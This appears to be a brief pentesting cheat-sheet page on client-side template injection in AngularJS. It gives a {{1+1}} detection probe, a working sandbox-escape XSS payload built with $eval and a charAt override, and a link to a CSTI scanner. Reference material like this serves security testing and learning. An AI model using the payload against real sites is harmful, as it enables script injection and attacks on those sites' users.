Hello World
Whoami
Pentest
Cloud
Antivirus Evasion - Defender
EDR BYPASS
Red Team
CTF

Powered by GitBook

On this page

Was this helpful?

CSTI

Client Side Template Injection

PreviousSSTI NextSSRF

Last updated 6 days ago

Angular

Detection:

{{1+1}}

XSS

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

More payload

Client-side template injection

GitHub - tijme/angularjs-csti-scanner: Automated client-side template injection (sandbox escape/bypass) detection for AngularJS v1.x.GitHub